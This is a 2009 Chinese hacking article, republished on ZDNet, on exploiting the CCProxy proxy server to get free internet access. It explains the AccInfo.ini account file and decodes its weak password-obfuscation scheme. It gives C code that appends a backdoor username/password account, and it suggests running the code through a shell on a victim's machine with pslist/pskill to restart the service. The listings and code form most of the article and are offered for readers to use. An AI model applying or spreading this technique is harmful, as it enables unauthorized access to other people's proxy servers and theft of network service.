黑客:用CCproxy漏洞实现免费上网

ZDNet软件频道 时间:2009-11-11 作者: | 比特网 我要评论()
本文关键词:网络攻击 黑客 ccproxy Windows
最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!

  最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!

  大家都知道ccproxy这个小软件吧!这个软件在我们学校比较流行,用代理的,基本上都是这个,呵呵,估计大家所在的学校和小区的局域网也是一样吧!那今天就让我给大家介绍这个软件:

  大家打开ccproxy的目录,只要大家以前配置个帐户,那么在其下面就会有个AccInfo.ini的文件,这个就是帐户配置文件,现在给大家分析一下:

  首先让大家看看一个典型的AccInfo.ini文件,代码如下:

  [System]

  UserCount=3  -----------这里是帐户的个数

  AuthModel=1  ----------1代表允许部分

  AuthType=2  ---------允许的连接模式的个数

  TimeScheduleCount=0

  WebFilterCount=0

  [User001]

  UserName=User-001

  Password=

  MACAddress=

  IPAddressLow=219.216.100.1

  IPAddressHigh=219.216.100.1

  ServiceMask=254

  MaxConn=-1

  BandWidth=-1

  WebFilter=-1

  TimeSchedule=-1

  EnableUserPassword=0

  EnableIPAddress=1

  EnableMACAddress=0

  [User002]

  UserName=User-001

  Password=898884883

  MACAddress=

  IPAddressLow=0.0.0.0

  IPAddressHigh=0.0.0.0

  ServiceMask=254

  MaxConn=-1

  BandWidth=-1

  WebFilter=-1

  TimeSchedule=-1

  EnableUserPassword=1

  EnableIPAddress=0

  EnableMACAddress=0

  大家看到上面注释的部分了吗?

  我要修改的也是这个地方!先来解释这个[AuthType=2  ----的接模式的个数]这里假如你的ccproxy只用一种验证模式,那么它就是1,假如你还有其他验证模式,比如用户/密码,MAC地址,...,的话那么Auth Type就会变化使等他的数字与你的验证模式种类数相同!

  经过我做实验知道,只要我们修改:UserCount=3 AuthModel=1 AuthType=2这三个地方,还有在下面在添加一些代码,那么重起ccproxy后,帐户就会添加成功了!但是大家要注意到这些地方,想[User-00x]的地方,有多少个用户,[User-00x]中的x就是多少,否则将会失败!还有就是假如我们添加代码成功后,必须重启动ccproxy,我们添加的帐户才会生效!

  好了现在我们来添加代码,我们要在ccproxy里新增一个新的用户,那么我们就可以在后添加上如下代码:

  [User00x]

  UserName=User-001

  Password=898884883

  MACAddress=

  IPAddressLow=0.0.0.0

  IPAddressHigh=0.0.0.0

  ServiceMask=254

  MaxConn=-1

  BandWidth=-1

  WebFilter=-1

  TimeSchedule=-1

  EnableUserPassword=1

  EnableIPAddress=0

  EnableMACAddress=0

  这段代码是什么意思呢?EnableUserPassword=1-----表示以用户/密码的验证模式;

  EnableIPAddress=0----------0表示不是这种模式,也就是不是IP地址验证模式;

  EnableMACAddress=0----------0表示不是这种模式,也就是不是MAC地址验证;当然还有很多种,我就不一一介绍了!

  UserName=User-001----------------用户名!

  Password=898884883----------------密码!

  那898 884 883表示什么呢?它表示的就是est!

  我现在列举一些例子:

  1------950

  2------949

  9------942

  a------902

  A------934

  a ------902

  b ------901

  c ------900

  d ------899

  z ------877

  大家看到这些应该知道了吧!950代表1,949代表2,依次递减!

  902代表a,901代表b,依次递减,大写的字母比小写字母大32;

  现在你就知道898884883代表的是est了吧!呵呵,大家也可以自己配置!

  好了说到这里,我们的发现的介绍也就基本完了!

  那么我们如果程序来添加一个新的帐户呢?(下面是我自己写的C代码,代码都没有进行任何的优化,希望大家不要笑)

  #include

  main()

  {int c=0,user,model,i;

  FILE*fp;

  clrscr();

  fp=fopen("AccInfo.ini","r+");

  while(c!=44)

  {getc(fp);

  c++;

  if(c==19){ user=getc(fp);

  printf(" the total user is:%c ",user);

  }

  if(c==41){ model=getc(fp);

  printf(" the curent model is:%c ",model);

  }

  }

  fseek(fp,20,0);

  putc(++user,fp);

  fseek(fp,45,0);

  putc(++model,fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r");

  c=0;

  while(c!=44)

  {putchar(getc(fp));

  c++;

  }

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("[User004] ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("UserName=User-001 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("Password=898884883 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("MACAddress= ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("IPAddressLow=0.0.0.0 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("IPAddressHigh=0.0.0.0 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("ServiceMask=254 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("MaxConn=-1 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("BandWidth=-1 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("WebFilter=-1 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("TimeSchedule=-1 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("EnableUserPassword=1 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("EnableIPAddress=0 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,0,2);

  fputs("EnableMACAddress=0 ",fp);

  fclose(fp);

  fp=fopen("AccInfo.ini","r+");

  fseek(fp,-237L,2);

  putc(user,fp);

  fclose(fp);

  }

  用TC或者VC都能编译出来!

  编译出来后大家可以放到ccproxy的目录下运行,看看是不是多了个新的帐户!验证形式:用户/密码

  用户名:User-001

  密码 :est

  其实作者本来设想的这个小东西应该具有如下功能的:

  搜索系统进程中是否有CCPRXOY,如果没有提示错误!

  并搜索ccproxy所在的目录,

  杀死ccproxy

  添加帐户;

  在重起ccproxy

  但是现在作者只写出了添加帐户的代码,其他的没时间去写了!大家可以自己发挥!剩余的代码,实现免费上网已经不是什么难题了!

  其实,大家想玩的话,不用我告诉你方法你都知道,只要大家拿到对方的一个shell上传到对方的 CCPOXY目录运行,结和pslist.exe和pskill.exe,也能先来玩玩!

网络攻击

黑客

ccproxy

Windows


百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134